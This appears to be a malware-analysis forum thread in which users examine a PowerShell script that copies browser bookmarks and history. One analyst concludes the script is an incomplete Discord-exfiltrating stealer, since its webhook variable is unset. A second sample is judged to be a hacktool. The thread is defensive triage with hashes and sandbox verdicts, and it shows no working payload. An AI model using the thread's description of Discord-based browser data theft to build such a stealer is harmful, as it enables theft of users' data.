Malware Analysis Evasive Stealer or Broken Sample?

[Xeno1234]

Possible Powershell Password Stealer I came across. Marked as clean via multiple online analysis sites but in the code it appears to take passwords and upload them to discord. Might be broken as multiple errors are displayed.
Could someone take a deeper look?

VirusTotal

VirusTotal

www.virustotal.com

Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'browserData.ps1'

Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.

www.hybrid-analysis.com

Triage | Behavioral Report

Have a look at the Hatching Triage automated malware analysis report for this sample, with a score of 1 out of 10.

tria.ge

Kaspersky Threat Intelligence Portal

Kaspersky Threat Intelligence Portal allows you to scan files, domains, IP addresses, and URLs for threats, malware, viruses

opentip.kaspersky.com

 

[WhiteMouse]

It doesn't seem like a password stealer to me. It only copy history and browser bookmarks to Temp\BrowserData.txt.

 

[harlan4096]

a4f643930f7dea2b36b3dcdf3bf572009e3d3f80eb413f7b554f1c0fc1454e2e.ps1 - Trojan-Spy.PowerShell.Agent.an

 

[likeastar20]

Didn’t test it/look at the code, but check the VT analysis:

“…Overall, the code seems to be designed to extract browser data and upload it to Discord, potentially for malicious purposes…”

 

[Xeno1234]

a4f643930f7dea2b36b3dcdf3bf572009e3d3f80eb413f7b554f1c0fc1454e2e.ps1 - Trojan-Spy.PowerShell.Agent.an

I guess Kaspersky added signatures for it

 

[harlan4096]

Yes

 

[Xeno1234]

It doesn't seem like a password stealer to me. It only copy history and browser bookmarks to Temp\BrowserData.txt.

View attachment 279019

You might be right. In the code im pretty sure it mentioned only bookmarks and history.

However, what should occur is that the data from BrowserData.txt is sent somewhere via discord.

 

[Xeno1234]

I’ve looked at this file a bit more and it appears to be a broken sample.

In all of the sandboxes, I’m 99% no discord webhook request was made (which is how it should transfer the data). Therefore the data just stays on the system.

 

[struppigel]

With this file not being obfuscated it is quite straightforward to determine what it does and that is copying bookmarks and history of Chrome, Firefox, Edge and Opera to BookMarks.txt and uploading this to Discord as indicated by the PowerShell function name.

What is missing, is the context where and how this Powershell code is being used.
This part of the code references a variable $dc

$hookurl = "$dc"

This variable is not set, but it should contain the upload location for Discord. This is also the reason why it is not working. There is no evasion going on, it is just incomplete.

Without context it can be hard to determine if such a file is malicious or clean. However, in this case, I would give it a malware verdict, because I cannot imagine any legitimate reason to upload such data to Discord.

There might be a small chance that some legitimate application has an edge case for doing this, but as a malware analyst I would decide to detect this as malware until someone complains, because in all cases I have seen so far such a functionality was in context of a stealer or RAT with stealing functionality, using Discord channels to communicate and exfiltrate data.

It is odd though, that the code is not obfuscated. I can imagine this being the result of an AMSI dump, it being the code after unpacking, or being some template or example code for a malware.

 

[Xeno1234]

I believe i've found another sample similar to this one.

bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99 | Triage

Check this report malware sample bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99, with a score of 1 out of 10.

tria.ge

VirusTotal

VirusTotal

www.virustotal.com

Appears to be some obsucre macro software, but I dont think its legitimate. Its signed by Node JS and its name leads to it being part of their software, refrences something related to minecraft services, and also runs a modified version of conhost, which the name of the process relates to Raccoon Stealer.
Clean on Opentip, Sophos Intelix, Triage, and low VT detections.

https://www.hybrid-analysis.com/sample/bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99/6525fd72f8acefc5eb034b5d

Detected by Falcon Sandbox

 

[Xeno1234]

I believe i've found another sample similar to this one.

bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99 | Triage

Check this report malware sample bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99, with a score of 1 out of 10.

tria.ge

VirusTotal

VirusTotal

www.virustotal.com

Appears to be some obsucre macro software, but I dont think its legitimate. Its signed by Node JS and its name leads to it being part of their software, refrences something related to minecraft services, and also runs a modified version of conhost, which the name of the process relates to Raccoon Stealer.
Clean on Opentip, Sophos Intelix, Triage, and low VT detections.

https://www.hybrid-analysis.com/sample/bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99/6525fd72f8acefc5eb034b5d

Detected by Falcon Sandbox

Kaspersky added Signatures. Fully undetected by Checkpoint Harmony yesterday

 

[likeastar20]

Kaspersky added Signatures. Fully undetected by Checkpoint Harmony yesterday

I believe i've found another sample similar to this one.

bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99 | Triage

Check this report malware sample bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99, with a score of 1 out of 10.

tria.ge

VirusTotal

VirusTotal

www.virustotal.com

Appears to be some obsucre macro software, but I dont think its legitimate. Its signed by Node JS and its name leads to it being part of their software, refrences something related to minecraft services, and also runs a modified version of conhost, which the name of the process relates to Raccoon Stealer.
Clean on Opentip, Sophos Intelix, Triage, and low VT detections.

https://www.hybrid-analysis.com/sample/bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99/6525fd72f8acefc5eb034b5d

Detected by Falcon Sandbox

Interesting detection name by Kaspersky

 

[struppigel]

I believe i've found another sample similar to this one.

bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99 | Triage

Check this report malware sample bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99, with a score of 1 out of 10.

tria.ge

VirusTotal

VirusTotal

www.virustotal.com

Appears to be some obsucre macro software, but I dont think its legitimate. Its signed by Node JS and its name leads to it being part of their software, refrences something related to minecraft services, and also runs a modified version of conhost, which the name of the process relates to Raccoon Stealer.
Clean on Opentip, Sophos Intelix, Triage, and low VT detections.

https://www.hybrid-analysis.com/sample/bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99/6525fd72f8acefc5eb034b5d

Detected by Falcon Sandbox

Assuming from the screenshot and the configuration file contents, it is a malware spreading hacktool.
I do not see similarity to the earlier sample.